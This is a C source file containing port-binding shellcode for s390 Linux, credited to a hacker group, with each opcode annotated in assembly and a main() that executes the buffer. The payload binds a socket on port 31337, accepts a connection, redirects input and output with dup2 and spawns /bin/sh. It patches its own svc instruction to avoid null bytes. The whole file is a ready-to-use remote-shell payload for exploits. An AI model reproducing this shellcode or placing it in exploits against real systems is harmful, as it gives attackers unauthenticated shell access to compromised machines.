/*----------------------------------------------------------------------*/
/* s390 portbinding shellcode - svc opcode 0x0a free                    */
/* code by jcyberpunk@thehackerschoice.com                              */
/*----------------------------------------------------------------------*/
char shellcode[]=
"\x0d\x10"              /* basr    %r1,%r0                              */
"\x41\x90\x10\xd4"      /* la      %r9,212(%r1)                         */
"\xa7\x68\x04\x56"      /* lhi     %r6,1110                             */
"\xa7\xa8\xfb\xb4"      /* lhi     %r10,-1100                           */
"\x1a\x6a"              /* ar      %r6,%r10                             */
"\x42\x60\x10\xd4"      /* stc     %r6,212(%r1)                         */
"\xa7\x28\x04\x4e"      /* lhi     %r2,1102                             */
"\x1a\x2a"              /* ar      %r2,%r10                             */
"\x40\x20\xf0\x78"      /* sth     %r2,120(%r15)                        */
"\xa7\x38\x7a\x69"      /* lhi     %r3,31337                            */
"\x40\x30\xf0\x7a"      /* sth     %r3,122(%r15)                        */
"\x17\x44"              /* xr      %r4,%r4                              */
"\x50\x40\xf0\x7c"      /* st      %r4,124(%r15)                        */
"\xa7\x38\x04\x4d"      /* lhi     %r3,1101                             */
"\x1a\x3a"              /* ar      %r3,%r10                             */
"\x90\x24\xf0\x80"      /* stm     %r2,%r4,128(%r15)                    */
"\xa7\x28\x04\x4d"      /* lhi     %r2,1101                             */
"\x1a\x2a"              /* ar      %r2,%r10                             */
"\x41\x30\xf0\x80"      /* la      %r3,128(%r15)                        */
"\x0d\xe9"              /* basr    %r14,%r9                             */
"\x18\x72"              /* lr      %r7,%r2                              */
"\x41\x30\xf0\x78"      /* la      %r3,120(%r15)                        */
"\xa7\x88\x04\x5c"      /* lhi     %r8,1116                             */
"\x1a\x8a"              /* ar      %r8,%r10                             */
"\x18\x48"              /* lr      %r4,%r8                              */
"\x90\x24\xf0\x80"      /* stm     %r2,%r4,128(%r15)                    */
"\xa7\x28\x04\x4e"      /* lhi     %r2,1102                             */
"\x1a\x2a"              /* ar      %r2,%r10                             */
"\x41\x30\xf0\x80"      /* la      %r3,128(%r15)                        */
"\x0d\xe9"              /* basr    %r14,%r9                             */
"\x18\x27"              /* lr      %r2,%r7                              */
"\xa7\x38\x04\x4d"      /* lhi     %r3,1101                             */
"\x1a\x3a"              /* ar      %r3,%r10                             */
"\x90\x23\xf0\x80"      /* stm     %r2,%r3,128(%r15)                    */
"\xa7\x28\x04\x50"      /* lhi     %r2,1104                             */
"\x1a\x2a"              /* ar      %r2,%r10                             */
"\x41\x30\xf0\x80"      /* la      %r3,128(%r15)                        */
"\x0d\xe9"              /* basr    %r14,%r9                             */
"\x18\x27"              /* lr      %r2,%r7                              */
"\x41\x30\xf0\x78"      /* la      %r3,120(%r15)                        */
"\x90\x23\xf0\x80"      /* stm     %r2,%r3,128(%r15)                    */
"\x50\x80\xf0\x88"      /* st      %r8,136(%r15)                        */
"\xa7\x28\x04\x51"      /* lhi     %r2,1105                             */
"\x1a\x2a"              /* ar      %r2,%r10                             */
"\x41\x30\xf0\x80"      /* la      %r3,128(%r15)                        */
"\x0d\xe9"              /* basr    %r14,%r9                             */
"\xa7\x68\x04\x8b"      /* lhi     %r6,1163                             */
"\x1a\x6a"              /* ar      %r6,%r10                             */
"\x42\x60\x10\xd5"      /* stc     %r6,213(%r1)                         */
"\xa7\x38\x04\x4e"      /* lhi     %r3,1102                             */
"\x1a\x3a"              /* ar      %r3,%r10                             */
"\x0d\xe9"              /* basr    %r14,%r9                             */
"\xa7\x3a\xff\xff"      /* ahi     %r3,-1                               */
"\x0d\xe9"              /* basr    %r14,%r9                             */
"\xa7\x3a\xff\xff"      /* ahi     %r3,-1                               */
"\x0d\xe9"              /* basr    %r14,%r9                             */
"\xa7\x68\x04\x57"      /* lhi     %r6,1111                             */
"\x1a\x6a"              /* ar      %r6,%r10                             */
"\x42\x60\x10\xd5"      /* stc     %r6,213(%r1)                         */
"\x41\x20\x10\xd8"      /* la      %r2,216(%r1)                         */
"\x50\x20\x10\xe0"      /* st      %r2,224(%r1)                         */
"\x41\x30\x10\xe0"      /* la      %r3,224(%r1)                         */
"\x17\x44"              /* xr      %r4,%r4                              */
"\x42\x40\x10\xdf"      /* stc     %r4,223(%r1)                         */
"\x50\x40\x10\xe4"      /* st      %r4,228(%r1)                         */
"\x41\x40\x10\xe4"      /* la      %r4,228(%r1)                         */
"\x0d\xe9"              /* basr    %r14,%r9                             */
"\x0b\x66"              /* svc     102          <--- after modification */
"\x07\xfe"              /* br      %r14                                 */
"\x2f\x62\x69\x6e"      /* /bin                                         */
"\x2f\x73\x68\x5c";     /* /sh\                                         */

main()
{
 void (*z)()=(void*)shellcode;
 z();
}